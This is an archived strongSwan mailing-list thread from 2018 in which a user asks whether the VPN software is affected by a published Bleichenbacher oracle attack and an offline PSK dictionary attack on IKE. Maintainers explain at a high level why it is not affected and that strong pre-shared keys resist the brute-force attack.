Discussion:
[strongSwan] (no subject)
Sandesh Sawant
2018-08-31 08:53:34 UTC
Permalink
Hi all,

I came across below news about a paper enlisting attacks pertaining to IKE
protocol, and want to know whether the latest version of trongSwan stack is
vulnerable to the attacks mentioned in this paper:
https://www.ei.rub.de/media/nds/veroeffentlichungen/2018/08/13/sec18-felsch.pdf
References:
https://latesthackingnews.com/2018/08/20/ipsec-vpn-connections-broken-using-20-year-old-flaw/
https://securityaffairs.co/wordpress/75352/hacking/key-reuse-ipsec-attack.html

Thanks,
Sandesh
Andreas Steffen
2018-08-31 10:20:11 UTC
Permalink
Hi Sandesh,

strongSwan is not vulnerable to the Bleichenbacher oracle attack
since we did not implement the RSA encryption authentication variant
for IKEv1.

Best regards

Andreas
Post by Sandesh Sawant
Hi all,
I came across below news about a paper enlisting attacks pertaining to
IKE protocol, and want to know whether the latest version of trongSwan
stack is vulnerable to the attacks mentioned in this
paper: https://www.ei.rub.de/media/nds/veroeffentlichungen/2018/08/13/sec18-felsch.pdf
https://latesthackingnews.com/2018/08/20/ipsec-vpn-connections-broken-using-20-year-old-flaw/
https://securityaffairs.co/wordpress/75352/hacking/key-reuse-ipsec-attack.html
Thanks,
Sandesh
======================================================================
Andreas Steffen ***@strongswan.org
strongSwan - the Open Source VPN Solution! www.strongswan.org
Institute for Networked Solutions
HSR University of Applied Sciences Rapperswil
CH-8640 Rapperswil (Switzerland)
===========================================================[INS-HSR]==
Sandesh Sawant
2018-09-03 09:20:27 UTC
Permalink
Hello Andreas,


Thanks for confirming that strongSwan isn't vulnerable to the mentioned
attack.


However the report claims to have exploits for PSK and RSA signature based
authentication also... Quoting from the report abstract:

"We exploit a Bleichenbacher oracle in an IKEv1 mode, where RSA

encrypted nonces are used for authentication. Using this

exploit, we break these RSA encryption based modes,

and in addition break RSA signature based authentication

in both IKEv1 and IKEv2. Additionally, we describe

an offline dictionary attack against the PSK (Pre-Shared

Key) based IKE modes, thus covering all available authentication

mechanisms of IKE."


Can you please confirm that strongSwan isn't vulnerable to the
Bleichenbacher attack against IKEv2 signature based auth and offline
dictionary attack mentioned for PSK based auth (irrespective of the PSK
chosen by the user)?


Thanks,

Sandesh

On Fri, Aug 31, 2018 at 3:50 PM Andreas Steffen <
Post by Andreas Steffen
Hi Sandesh,
strongSwan is not vulnerable to the Bleichenbacher oracle attack
since we did not implement the RSA encryption authentication variant
for IKEv1.
Best regards
Andreas
Post by Sandesh Sawant
Hi all,
I came across below news about a paper enlisting attacks pertaining to
IKE protocol, and want to know whether the latest version of trongSwan
stack is vulnerable to the attacks mentioned in this
https://www.ei.rub.de/media/nds/veroeffentlichungen/2018/08/13/sec18-felsch.pdf
https://latesthackingnews.com/2018/08/20/ipsec-vpn-connections-broken-using-20-year-old-flaw/
https://securityaffairs.co/wordpress/75352/hacking/key-reuse-ipsec-attack.html
Post by Sandesh Sawant
Thanks,
Sandesh
======================================================================
strongSwan - the Open Source VPN Solution! www.strongswan.org
Institute for Networked Solutions
HSR University of Applied Sciences Rapperswil
CH-8640 Rapperswil (Switzerland)
===========================================================[INS-HSR]==
Graham Bartlett (grbartle)
2018-09-03 10:19:15 UTC
Permalink
Hi Sandesh



The offline dictionary PSK attack isn’t something new (people have known about this since last millennia!).



In summary if you have a ‘strong’ PSK you’re safe.. But if you have an active MiTM as described in the paper then they can perform an offline brute force attack against your PSK assuming they have the computing power to find it..



I wrote the following to help explain this..



https://www.linkedin.com/pulse/ike-brute-force-attack-explained-graham-bartlett/



cheers



From: Users <users-***@lists.strongswan.org> on behalf of Sandesh Sawant <***@gmail.com>
Date: Monday, 3 September 2018 at 10:20
To: "***@strongswan.org" <***@strongswan.org>
Cc: "***@lists.strongswan.org" <***@lists.strongswan.org>
Subject: Re: [strongSwan] (no subject)



Hello Andreas,



Thanks for confirming that strongSwan isn't vulnerable to the mentioned attack.



However the report claims to have exploits for PSK and RSA signature based authentication also... Quoting from the report abstract:

"We exploit a Bleichenbacher oracle in an IKEv1 mode, where RSA

encrypted nonces are used for authentication. Using this

exploit, we break these RSA encryption based modes,

and in addition break RSA signature based authentication

in both IKEv1 and IKEv2. Additionally, we describe

an offline dictionary attack against the PSK (Pre-Shared

Key) based IKE modes, thus covering all available authentication

mechanisms of IKE."



Can you please confirm that strongSwan isn't vulnerable to the Bleichenbacher attack against IKEv2 signature based auth and offline dictionary attack mentioned for PSK based auth (irrespective of the PSK chosen by the user)?



Thanks,

Sandesh



On Fri, Aug 31, 2018 at 3:50 PM Andreas Steffen <***@strongswan.org> wrote:

Hi Sandesh,

strongSwan is not vulnerable to the Bleichenbacher oracle attack
since we did not implement the RSA encryption authentication variant
for IKEv1.

Best regards

Andreas
Post by Sandesh Sawant
Hi all,
I came across below news about a paper enlisting attacks pertaining to
IKE protocol, and want to know whether the latest version of trongSwan
stack is vulnerable to the attacks mentioned in this
paper: https://www.ei.rub.de/media/nds/veroeffentlichungen/2018/08/13/sec18-felsch.pdf
https://latesthackingnews.com/2018/08/20/ipsec-vpn-connections-broken-using-20-year-old-flaw/
https://securityaffairs.co/wordpress/75352/hacking/key-reuse-ipsec-attack.html
Thanks,
Sandesh
======================================================================
Andreas Steffen ***@strongswan.org
strongSwan - the Open Source VPN Solution! www.strongswan.org
Institute for Networked Solutions
HSR University of Applied Sciences Rapperswil
CH-8640 Rapperswil (Switzerland)
===========================================================[INS-HSR]==
Sandesh Sawant
2018-09-04 06:15:56 UTC
Permalink
Hi Graham,

Thanks for clarifying this further.

Best,
Sandesh
On Mon, Sep 3, 2018 at 3:49 PM Graham Bartlett (grbartle) <
Post by Andreas Steffen
Hi Sandesh
The offline dictionary PSK attack isn’t something new (people have known
about this since last millennia!).
In summary if you have a ‘strong’ PSK you’re safe.. But if you have an
active MiTM as described in the paper then they can perform an offline
brute force attack against your PSK assuming they have the computing power
to find it..
I wrote the following to help explain this..
https://www.linkedin.com/pulse/ike-brute-force-attack-explained-graham-bartlett/
cheers
*Date: *Monday, 3 September 2018 at 10:20
*Subject: *Re: [strongSwan] (no subject)
Hello Andreas,
Thanks for confirming that strongSwan isn't vulnerable to the mentioned attack.
However the report claims to have exploits for PSK and RSA signature based
"We exploit a Bleichenbacher oracle in an IKEv1 mode, where RSA
encrypted nonces are used for authentication. Using this
exploit, we break these RSA encryption based modes,
and in addition break RSA signature based authentication
in both IKEv1 and IKEv2. Additionally, we describe
an offline dictionary attack against the PSK (Pre-Shared
Key) based IKE modes, thus covering all available authentication
mechanisms of IKE."
Can you please confirm that strongSwan isn't vulnerable to the
Bleichenbacher attack against IKEv2 signature based auth and offline
dictionary attack mentioned for PSK based auth (irrespective of the PSK
chosen by the user)?
Thanks,
Sandesh
On Fri, Aug 31, 2018 at 3:50 PM Andreas Steffen <
Hi Sandesh,
strongSwan is not vulnerable to the Bleichenbacher oracle attack
since we did not implement the RSA encryption authentication variant
for IKEv1.
Best regards
Andreas
Post by Sandesh Sawant
Hi all,
I came across below news about a paper enlisting attacks pertaining to
IKE protocol, and want to know whether the latest version of trongSwan
stack is vulnerable to the attacks mentioned in this
https://www.ei.rub.de/media/nds/veroeffentlichungen/2018/08/13/sec18-felsch.pdf
https://latesthackingnews.com/2018/08/20/ipsec-vpn-connections-broken-using-20-year-old-flaw/
https://securityaffairs.co/wordpress/75352/hacking/key-reuse-ipsec-attack.html
Post by Sandesh Sawant
Thanks,
Sandesh
======================================================================
strongSwan - the Open Source VPN Solution! www.strongswan.org
Institute for Networked Solutions
HSR University of Applied Sciences Rapperswil
CH-8640 Rapperswil (Switzerland)
===========================================================[INS-HSR]==
Andreas Steffen
2018-09-04 06:24:22 UTC
Permalink
Hi Sandesh,

RSA signature-based authentication can only be broken if the
same RSA key is being used as for RSA encryption-based authentication
and this RSA key is broken applying the Bleichenbacher oracle to
RSA encryption-based authentication.

Since strongSwan does not implement RSA encryption, the RSA key cannot
be determined using the Bleichenbacher oracle and therefore IKEv1 and
IKEv2 RSA signatures cannot be compromised.

It has always been known that IKEv1 and IKEv2 PSK-based authentication
can be broken with an offline attack if the PSK is too weak. This is why
we recommend EAP-based user authentication with IKEv2 where the server
must authenticate itself first

PSKs with 128 bit cryptographic strength or more cannot be broken.

Best regards

Andreas
Post by Sandesh Sawant
Hello Andreas,
Thanks for confirming that strongSwan isn't vulnerable to the mentioned
attack.
However the report claims to have exploits for PSK and RSA signature
based authentication also... Quoting from the report abstract: 
 "We exploit a Bleichenbacher oracle in an IKEv1 mode, where RSA
encrypted nonces are used for authentication. Using this
exploit, we break these RSA encryption  based modes,
and in addition break RSA signature  based authentication
in both IKEv1 and IKEv2. Additionally, we describe
an offline dictionary attack against the PSK (Pre-Shared
Key) based IKE modes, thus covering all available authentication
mechanisms of IKE."
Can you please confirm that strongSwan isn't vulnerable to the
Bleichenbacher attack against IKEv2 signature based auth and offline
dictionary attack mentioned for PSK based auth (irrespective of the PSK
chosen by the user)?
Thanks,
Sandesh
On Fri, Aug 31, 2018 at 3:50 PM Andreas Steffen
Hi Sandesh,
strongSwan is not vulnerable to the Bleichenbacher oracle attack
since we did not implement the RSA encryption authentication variant
for IKEv1.
Best regards
Andreas
Post by Sandesh Sawant
Hi all,
I came across below news about a paper enlisting attacks pertaining to
IKE protocol, and want to know whether the latest version of trongSwan
stack is vulnerable to the attacks mentioned in this
paper: https://www.ei.rub.de/media/nds/veroeffentlichungen/2018/08/13/sec18-felsch.pdf
https://latesthackingnews.com/2018/08/20/ipsec-vpn-connections-broken-using-20-year-old-flaw/
https://securityaffairs.co/wordpress/75352/hacking/key-reuse-ipsec-attack.html
Post by Sandesh Sawant
Thanks,
Sandesh
======================================================================
Andreas Steffen ***@strongswan.org
strongSwan - the Open Source VPN Solution! www.strongswan.org
Institute for Networked Solutions
HSR University of Applied Sciences Rapperswil
CH-8640 Rapperswil (Switzerland)
===========================================================[INS-HSR]==
Continue reading on narkive:
Loading...